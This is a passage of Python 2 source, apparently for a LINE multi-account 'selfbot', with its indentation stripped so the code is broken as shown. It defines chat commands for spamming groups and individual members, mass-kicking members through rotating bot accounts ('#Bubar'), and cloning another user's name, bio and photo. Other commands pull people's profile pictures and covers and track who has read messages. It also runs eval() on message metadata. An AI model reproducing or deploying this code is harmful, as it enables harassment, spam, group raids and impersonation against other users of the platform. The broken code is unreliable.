elif msg.text in ["Auto leave:off"]:
if msg.from_ in admin:
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already")
#===============================================================
elif msg.text in ["Auto like:on"]:
if msg.from_ in admin:
if wait["likeOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done。")
else:
wait["likeOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already。")
elif msg.text in ["Auto like:off"]:
if msg.from_ in admin:
if wait["likeOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done。")
else:
wait["likeOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already。")
#==========================================================
elif msg.text in ["Settings"]:
if msg.from_ in admin:
print "Setting pick up..."
md="list of bot settings\n\n"
if wait["likeOn"] == True: md+="Auto like : on\n"
else:md+="Auto like : off\n"
if mimic["copy"] == True: md+="Mimic : on\n"
else:md+="Mimic : off\n"
if wait["winvite"] == True: md+="Invite : on\n"
else:md+="Invite : off\n"
if wait["pname"] == True: md+="Namelock : on\n"
else:md+="Namelock : off\n"
if wait["contact"] == True: md+="Notice : on\n"
else: md+="Notice : off\n"
if wait["autoJoin"] == True: md+="Auto join : on\n"
else: md +="Auto join : off\n"
if wait["autoCancel"]["on"] == True:md+="Group cancel :" + str(wait["autoCancel"]["members"]) + "\n"
else: md+= "Group cancel : off\n"
if wait["leaveRoom"] == True: md+="Auto leave : on\n"
else: md+="Auto leave : off\n"
if wait["clock"] == True: md+="Clock Name : on\n"
else:md+="Clock Name : off\n"
if wait["autoAdd"] == True: md+="Auto add : on\n"
else:md+="Auto add : off\n"
if wait["commentOn"] == True: md+="Comment : on\n"
else:md+="Comment : off\n"
if wait["Backup"] == True: md+="Backup : on\n"
else:md+="Backup : off\n"
if wait["qr"] == True: md+="Protect QR : on\n"
else:md+="Protect QR : off\n"
if wait["welcomemsg"] == True: md+="welcome message : on\n"
else:md+="welcome message : off\n"
if wait["protectionOn"] == True: md+="Protection : hight\n\n"+ datetime.today().strftime('%H:%M:%S')
else:md+="Protection : low\n\n"+ datetime.today().strftime('%H:%M:%S')
if wait["autorein"] == True: md+="auto reinvite : on\n"
else:md+="auto reinvite : off\n"
if wait["pelaku"] == True: md+="shows offender : on\n"
else:md+="shows offender : off\n"
if wait["tag"] == True: md+"Notag : on\n"
else:md+="Notag : off\n"
cl.sendText(msg.to,md)
#========================================
#------------------------------------------------
elif "Time" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to,datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["PING","Ping","ping"]:
if msg.from_ in admin:
ki.sendText(msg.to,"PONG double thumbs upHar Har")
kk.sendText(msg.to,"PONG double thumbs upHar Har")
kc.sendText(msg.to,"PONG double thumbs upHar Har")
ks.sendText(msg.to,"PONG double thumbs upHar Har")
kt.sendText(msg.to,"PONG double thumbs upHar Har")
cl.sendText(msg.to,"PONG double thumbs upHar Har")
elif "Info @" in msg.text:
if msg.from_ in admin:
nama = msg.text.replace("Info @","")
target = nama.rstrip(' ')
tob = cl.getGroup(msg.to)
for g in tob.members:
if target == g.displayName:
gjh= cl.getContact(g.mid)
try:
cover = cl.channel.getCover(g.mid)
except:
cover = ""
cl.sendText(msg.to,"[Display Name]:\n" + gjh.displayName + "\n[Mid]:\n" + gjh.mid + "\n[BIO]:\n" + gjh.statusMessage + "\n[pict profile]:\nhttp://dl.profile.line-cdn.net/" + gjh.pictureStatus + "\n[Cover]:\n" + str(cover))
else:
pass
#-----------------------------------------------
elif msg.text in ["Backup:on"]:
if msg.from_ in admin:
if wait["Backup"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been active\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been enable\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["Backup"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been active\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been enable\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Backup:off"]:
if msg.from_ in admin:
if wait["Backup"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been unactive\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been desable\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["Backup"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been unactive\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been desable\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Rejectall"]:
if msg.from_ in admin:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Invites has been Rejected")
else:
cl.sendText(msg.to,"拒绝了全部的邀请。")
elif msg.text in ["Auto add:on"]:
if msg.from_ in admin:
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"success activated")
else:
cl.sendText(msg.to,"success activated")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"success activated")
else:
cl.sendText(msg.to,"success activated")
elif msg.text in ["Auto add:off"]:
if msg.from_ in admin:
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"success unactivated")
else:
cl.sendText(msg.to,"success unactivated")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"success unactivated")
else:
cl.sendText(msg.to,"success unactivated")
#========================================
elif "pam @" in msg.text:
_name = msg.text.replace("pam @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
cl.sendText(g.mid,"Spammed")
ki.sendText(g.mid,"Spammed")
kc.sendText(g.mid,"Spammed")
ks.sendText(g.mid,"Spammed")
kk.sendText(g.mid,"Spammed")
kt.sendText(g.mid,"Spammed")
ct.sendText(msg.to,"done spam bossque")
#========================================
elif "Update welcome:" in msg.text:
if msg.from_ in admin:
wait["welmsg"] = msg.text.replace("Update welcome:","")
cl.sendText(msg.to,"update welcome message succes"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Check welcome message"]:
if msg.from_ in admin:
if wait["lang"] == "JP":
cl.sendText(msg.to,"yor bot message\n\n" + wait["welmsg"])
else:
cl.sendText(msg.to,"The automatic appending information is set as follows。\n\n" + wait["welmsg"])
elif "Message:" in msg.text:
if msg.from_ in admin:
wait["message"] = msg.text.replace("Message:","")
cl.sendText(msg.to,"bot message\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif "Add message:" in msg.text:
if msg.from_ in admin:
wait["message"] = msg.text.replace("Add message:","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"message changed\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"done。\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Check message"]:
if msg.from_ in admin:
if wait["lang"] == "JP":
cl.sendText(msg.to,"yor bot message\n\n" + wait["message"])
else:
cl.sendText(msg.to,"The automatic appending information is set as follows。\n\n" + wait["message"])
elif "Comment:" in msg.text:
if msg.from_ in admin:
c = msg.text.replace("Comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"String that can not be changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
elif "Add comment:" in msg.text:
if msg.from_ in admin:
c = msg.text.replace("Add comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"String that can not be changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
elif msg.text in ["Comment:on"]:
if msg.from_ in admin:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"Already on")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Comment:off"]:
if msg.from_ in admin:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"Already off")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"Already off")
elif msg.text in ["Check comment"]:
if msg.from_ in admin:
cl.sendText(msg.to,"message comment\n\n" + str(wait["comment"]))
elif msg.text in ["Gurl"]:
if msg.from_ in admin:
if msg.toType == 2:
uye = random.choice(KAC)
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
uye.updateGroup(x)
gurl = uye.reissueGroupTicket(msg.to)
uye.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
uye.sendText(msg.to,"Can not be used outside the group")
else:
uye.sendText(msg.to,"Not for use less than group")
#===========================================
elif msg.text.lower() == 'responsename':
if msg.from_ in admin:
profile = cl.getProfile()
text = profile.displayName + " Cʳᵒᵗ"
cl.sendText(msg.to, text)
profile = ki.getProfile()
text = profile.displayName + " Cʳᵒᵗ"
ki.sendText(msg.to, text)
profile = kk.getProfile()
text = profile.displayName + " Cʳᵒᵗ"
kk.sendText(msg.to, text)
profile = kc.getProfile()
text = profile.displayName + " Cʳᵒᵗ"
kc.sendText(msg.to, text)
profile = ks.getProfile()
text = profile.displayName + " Cʳᵒᵗ"
ks.sendText(msg.to, text)
profile = kt.getProfile()
text = profile.displayName + " Cʳᵒᵗ"
kt.sendText(msg.to, text)
#========================================
elif msg.text in ["Comment bl "]:
wait["wblack"] = True
cl.sendText(msg.to,"add to comment bl")
elif msg.text in ["Comment wl "]:
wait["dblack"] = True
cl.sendText(msg.to,"wl to comment bl")
elif msg.text in ["Comment bl confirm"]:
if wait["commentBlack"] == {}:
cl.sendText(msg.to,"confirmed")
else:
cl.sendText(msg.to,"Blacklist s")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "・" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif msg.text in ["Clock:on","Clock on","Jam on","Jam:on"]:
if wait["clock"] == True:
cl.sendText(msg.to,"already on")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"[%H:%M]")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"done")
elif msg.text in ["Clock:off","Clock off","Jam off","Jam:off"]:
if wait["clock"] == False:
cl.sendText(msg.to,"already off")
else:
wait["clock"] = False
cl.sendText(msg.to,"done")
elif "Cc: " in msg.text:
n = msg.text.replace("Cc: ","")
if len(n.decode("utf-8")) > 13:
cl.sendText(msg.to,"changed")
else:
wait["cName"] = n
cl.sendText(msg.to,"Changed to:\n\n" + n)
elif msg.text in ["Up"]:
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"[%H:%M]")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"Refresh to update")
else:
cl.sendText(msg.to,"Please turn on the name clock")
#========================================
elif "Steal cover @" in msg.text:
if msg.from_ in admin:
print "[Command]dp executing"
_name = msg.text.replace("Steal cover @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
elif "Midpict:" in msg.text:
if msg.from_ in admin:
umid = msg.text.replace("Midpict:","")
contact = cl.getContact(umid)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithURL(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
elif "Steal pict " in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
msg.contentType = 0
steal0 = msg.text.replace("Steal pict ","")
steal1 = steal0.lstrip()
steal2 = steal1.replace("@","")
steal3 = steal2.rstrip()
_name = steal3
group = cl.getGroup(msg.to)
targets = []
for g in group.members:
if _name == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithURL(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
except:
cl.sendText(msg.to,"Error!")
break
else:
cl.sendText(msg.to,"Tidak bisa dilakukan di luar grup")
elif "Pict group " in msg.text:
saya = msg.text.replace('Pict group ','')
gid = cl.getGroupIdsJoined()
for i in gid:
h = cl.getGroup(i).name
gna = cl.getGroup(i)
if h == saya:
cl.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ gna.pictureStatus)
elif msg.text in ["My name"]:
h = cl.getContact(mid)
cl.sendText(msg.to,"===[DisplayName]===\n" + h.displayName)
elif msg.text in ["My bio"]:
h = cl.getContact(mid)
cl.sendText(msg.to,"===[StatusMessage]===\n" + h.statusMessage)
elif msg.text in ["My pict"]:
h = cl.getContact(mid)
cl.sendImageWithUrl(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["My cover"]:
h = cl.getContact(mid)
cu = cl.channel.getCover(mid)
path = str(cu)
cl.sendImageWithUrl(msg.to, path)
elif "Pap set:" in msg.text:
wait["Pap"] = msg.text.replace("Pap set:","")
cl.sendText(msg.to,"Pap Has Ben Set To")
elif msg.text in [".Pap","Pap"]:
cl.sendImageWithURL(msg.to,wait["Pap"])
#==≠============================================
elif "Vn " in msg.text:
say = msg.text.replace("Vn ","")
lang = 'id'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudio(msg.to,"hasil.mp3")
elif msg.text in ["Kalender","/waktu"]:
timeNow = datetime.now()
timeHours = datetime.strftime(timeNow,"(%H:%M)")
day = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday","Friday", "Saturday"]
hari = ["Minggu", "Senin", "Selasa", "Rabu", "Kamis", "Jumat", "Sabtu"]
bulan = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"]
inihari = datetime.today()
hr = inihari.strftime('%A')
bln = inihari.strftime('%m')
for i in range(len(day)):
if hr == day[i]: hasil = hari[i]
for k in range(0, len(bulan)):
if bln == str(k): blan = bulan[k-1]
rst = hasil + ", " + inihari.strftime('%d') + " - " + blan + " - " + inihari.strftime('%Y') + "\nJam : [ " + inihari.strftime('%H:%M:%S') + " ]"
cl.sendText(msg.to, rst)
elif "Creat group" in msg.text:
thisgroup = cl.getGroups([msg.to])
Mids = [contact.mid for contact in thisgroup[0].members]
mi_d = Mids[:33]
cl.createGroup("New", mi_d)
cl.sendText(msg.to,"Succes creat new group")
elif msg.text in ["Like:friend", "Bot like temen"]:
print "[Command]Like executed"
cl.sendText(msg.to,"pertamax")
try:
likefriend()
except:
pass
elif "Cek zodiak " in msg.text:
tanggal = msg.text.replace("Cek zodiak ","")
r=requests.get('https://script.google.com/ macros/exec?service=AKfycbw7gKzP-WYV 2F5mc9RaR7yE3Ve1yN91Tjs91hp_jHSE02dSv9w&nama=ervan&tanggal='+tanggal)
data=r.text
data=json.loads(data)
lahir = data["data"]["lahir"]
usia = data["data"]["usia"]
ultah = data["data"]["ultah"]
zodiak = data["data"]["zodiak"]
cl.sendText(msg.to,"Tanggal Lahir: "+lahir+"\n\nUsia:"+usia+"\n\nUltah: "+ultah+"\n\nZodiak: "+zodiak)
elif "Steal " in msg.text:
if msg.from_ in admin:
salsa = msg.text.replace("Steal ","")
Manis = cl.getContact(salsa)
Imoet = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
try:
cover = cl.channel.getCover(Manis)
except:
cover = ""
cl.sendText(msg.to,"Gambar Foto Profilenya")
cl.sendImageWithURL(msg.to,Imoet)
if cover == "":
cl.sendText(msg.to,"User tidak memiliki cover atau sejenisnya")
else:
cl.sendText(msg.to,"Gambar Covernya")
cl.sendImageWithURL(msg.to,cover)
#===============================================
elif msg.text in ["Sp"]:
if msg.from_ in admin:
cl.sendText(msg.to, "Pᵉˡᵃⁿ-Pᵉˡᵃⁿ Sᵃʸᵃⁿᵍ...😃")
start = time.time()
time.sleep(0.02)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sCʳᵒᵗ" % (elapsed_time))
print "[Command]Speed executed"
elif msg.text in ["Speed","speed"]:
if msg.from_ in admin:
start = time.time()
print("Speed")
cl.sendText(msg.to, "Pᵉˡᵃⁿ-Pᵉˡᵃⁿ Sᵃʸᵃⁿᵍ...😃")
start = time.time()
time.sleep(0.02)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sCʳᵒᵗ" % (elapsed_time))
ki.sendText(msg.to, "%sCʳᵒᵗ" % (elapsed_time))
kk.sendText(msg.to, "%sCʳᵒᵗ" % (elapsed_time))
kc.sendText(msg.to, "%sCʳᵒᵗ" % (elapsed_time))
ks.sendText(msg.to, "%sCʳᵒᵗ" % (elapsed_time))
kt.sendText(msg.to, "%sCʳᵒᵗ" % (elapsed_time))
#========================================
elif msg.text in ["My backup"]:
if msg.from_ in admin:
wek = cl.getContact(mid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mydn.txt',"w")
s.write(r)
s.close()
t = open('mysm.txt',"w")
t.write(i)
t.close()
u = open('myps.txt',"w")
u.write(a)
u.close()
cl.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot2 backup run"]:
if msg.from_ in admin:
wek = ki.getContact(Amid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mgydn.txt',"w")
s.write(r)
s.close()
t = open('myesm.txt',"w")
t.write(i)
t.close()
u = open('mypfs.txt',"w")
u.write(a)
u.close()
ki.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot3 backup run"]:
if msg.from_ in admin:
wek = kk.getContact(Bmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('msgydn.txt',"w")
s.write(r)
s.close()
t = open('mysfdgm.txt',"w")
t.write(i)
t.close()
u = open('gymyps.txt',"w")
u.write(a)
u.close()
kk.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot4 backup run"]:
if msg.from_ in admin:
wek = kc.getContact(Cmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('jhmydn.txt',"w")
s.write(r)
s.close()
t = open('myhfsm.txt',"w")
t.write(i)
t.close()
u = open('mypfhs.txt',"w")
u.write(a)
u.close()
kc.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot5 backup run"]:
if msg.from_ in admin:
wek = ks.getContact(Dmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('madydn.txt',"w")
s.write(r)
s.close()
t = open('mysgjm.txt',"w")
t.write(i)
t.close()
u = open('myrdps.txt',"w")
u.write(a)
u.close()
ks.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot6 backup run"]:
if msg.from_ in admin:
wek = kt.getContact(Emid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mydnsgv.txt',"w")
s.write(r)
s.close()
t = open('jhmysm.txt',"w")
t.write(i)
t.close()
u = open('myiyps.txt',"w")
u.write(a)
u.close()
kt.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
#----------------------------------------------
elif "My clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = cl.getContact(target)
X = contact.displayName
profile = cl.getProfile()
profile.displayName = X
cl.updateProfile(profile)
cl.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = cl.getProfile()
lol.statusMessage = Y
cl.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
cl.updateProfilePicture(P)
except Exception as e:
cl.sendText(msg.to, "Failed!")
print e
elif "Bot2 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = ki.getContact(target)
X = contact.displayName
profile = ki.getProfile()
profile.displayName = X
ki.updateProfile(profile)
ki.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = ki.getProfile()
lol.statusMessage = Y
ki.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
ki.updateProfilePicture(P)
except Exception as e:
ki.sendText(msg.to, "Failed!")
print e
elif "Bot3 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = kk.getContact(target)
X = contact.displayName
profile = kk.getProfile()
profile.displayName = X
kk.updateProfile(profile)
kk.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = kk.getProfile()
lol.statusMessage = Y
kk.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
kk.updateProfilePicture(P)
except Exception as e:
kk.sendText(msg.to, "Failed!")
print e
elif "Bot4 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = kc.getContact(target)
X = contact.displayName
profile = kc.getProfile()
profile.displayName = X
kc.updateProfile(profile)
kc.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = kc.getProfile()
lol.statusMessage = Y
kc.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
kc.updateProfilePicture(P)
except Exception as e:
kc.sendText(msg.to, "Failed!")
print e
elif "Bot5 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = ks.getContact(target)
X = contact.displayName
profile = ks.getProfile()
profile.displayName = X
ks.updateProfile(profile)
ks.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = ks.getProfile()
lol.statusMessage = Y
ks.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
ks.updateProfilePicture(P)
except Exception as e:
ks.sendText(msg.to, "Failed!")
print e
elif "Bot6 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = kt.getContact(target)
X = contact.displayName
profile = kt.getProfile()
profile.displayName = X
kt.updateProfile(profile)
kt.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = kt.getProfile()
lol.statusMessage = Y
kt.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
kt.updateProfilePicture(P)
except Exception as e:
kt.sendText(msg.to, "Failed!")
print e
#=================================================
elif "My backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mydn.txt',"r")
name = h.read()
h.close()
x = name
profile = cl.getProfile()
profile.displayName = x
cl.updateProfile(profile)
i = open('mysm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = cl.getProfile()
cak.statusMessage = y
cl.updateProfile(cak)
j = open('myps.txt',"r")
ps = j.read()
j.close()
p = ps
cl.updateProfilePicture(p)
cl.sendText(msg.to, "Succes")
except Exception as e:
cl.sendText(msg.to,"Gagagl!")
print e
elif "Bot2 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mgydn.txt',"r")
name = h.read()
h.close()
x = name
profile = ki.getProfile()
profile.displayName = x
ki.updateProfile(profile)
i = open('myesm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = ki.getProfile()
cak.statusMessage = y
ki.updateProfile(cak)
j = open('mypfs.txt',"r")
ps = j.read()
j.close()
p = ps
ki.updateProfilePicture(p)
ki.sendText(msg.to, "Succes")
except Exception as e:
ki.sendText(msg.to,"Gagagl!")
print e
elif "Bot3 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('msgydn.txt',"r")
name = h.read()
h.close()
x = name
profile = kk.getProfile()
profile.displayName = x
kk.updateProfile(profile)
i = open('mysfdgm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = kk.getProfile()
cak.statusMessage = y
kk.updateProfile(cak)
j = open('gymyps.txt',"r")
ps = j.read()
j.close()
p = ps
kk.updateProfilePicture(p)
kk.sendText(msg.to, "Succes")
except Exception as e:
kk.sendText(msg.to,"Gagagl!")
print e
elif "Bot4 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('jhmydn.txt',"r")
name = h.read()
h.close()
x = name
profile = kc.getProfile()
profile.displayName = x
kc.updateProfile(profile)
i = open('myhfsm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = kc.getProfile()
cak.statusMessage = y
kc.updateProfile(cak)
j = open('mypfhs.txt',"r")
ps = j.read()
j.close()
p = ps
kc.updateProfilePicture(p)
kc.sendText(msg.to, "Succes")
except Exception as e:
kc.sendText(msg.to,"Gagagl!")
print e
elif "Bot5 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('madydn.txt',"r")
name = h.read()
h.close()
x = name
profile = ks.getProfile()
profile.displayName = x
ks.updateProfile(profile)
i = open('mysgjm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = ks.getProfile()
cak.statusMessage = y
ks.updateProfile(cak)
j = open('myrdps.txt',"r")
ps = j.read()
j.close()
p = ps
ks.updateProfilePicture(p)
ks.sendText(msg.to, "Succes")
except Exception as e:
ks.sendText(msg.to,"Gagagl!")
print e
elif "Bot6 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mydnsgv.txt',"r")
name = h.read()
h.close()
x = name
profile = kt.getProfile()
profile.displayName = x
kt.updateProfile(profile)
i = open('jhmysm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = kt.getProfile()
cak.statusMessage = y
kt.updateProfile(cak)
j = open('myiyps.txt',"r")
ps = j.read()
j.close()
p = ps
kt.updateProfilePicture(p)
kt.sendText(msg.to, "Succes")
except Exception as e:
kt.sendText(msg.to,"Gagagl!")
print e
#=================================================
elif msg.text == "Lurking":
if msg.from_ in admin:
cl.sendText(msg.to, "Set point.")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%Y-%m-%d %H:%M')
wait2['ROM'][msg.to] = {}
print wait2
elif msg.text == "Lurk":
if msg.from_ in admin:
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "╔═══════════════%s\n╠════════════════\n%s╠═══════════════\n║Readig point creation:\n║ [%s]\n╚════════════════" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
else:
cl.sendText(msg.to, "anda slah ketik-_-")
#========================================
#---------------FUNGSI RATAIN GRUP TANPA KICK SESAMA BOT/Admin/Bots----------#
elif "#Bubar" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "ok cleanse"
_name = msg.text.replace("#Bubar","")
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
cl.sendText(msg.to,"Pᵉˡᵃⁿ-Pᵉˡᵃⁿ Sᵃʸᵃⁿᵍ ")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"you are not admin")
else:
for target in targets:
if not target in Bots:
if not target in admin:
try:
klist=[ki,kk,kc,ks,kt]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
cl.sendText(msg.to,"Tᵘʰ ᵏᵃᵃⁿ Cʳᵒᵗˢ...😃")
#================================================
#========================================
elif msg.text.lower() == 'welcome':
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
cl.sendText(msg.to,"Selamat Datang Di Grup " + str(ginfo.name))
cl.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName )
#=======================================
#-------------------Fungsi spam start--------------------------
elif "Spam change:" in msg.text:
if msg.from_ in admin:
wait["spam"] = msg.text.replace("Spam change:","")
cl.sendText(msg.to,"spam changed")
elif "Spam add:" in msg.text:
if msg.from_ in admin:
wait["spam"] = msg.text.replace("Spam add:","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"spam changed")
else:
cl.sendText(msg.to,"Done")
elif "Spam:" in msg.text:
if msg.from_ in admin:
strnum = msg.text.replace("Spam:","")
num = int(strnum)
for var in range(0,num):
cl.sendText(msg.to, wait["spam"])
#-------------------Fungsi spam finish----------------------------
#-----------------------------------------------
#-----------------------------------------------
elif 'apakah' in msg.text.lower():
if msg.from_ in admin:
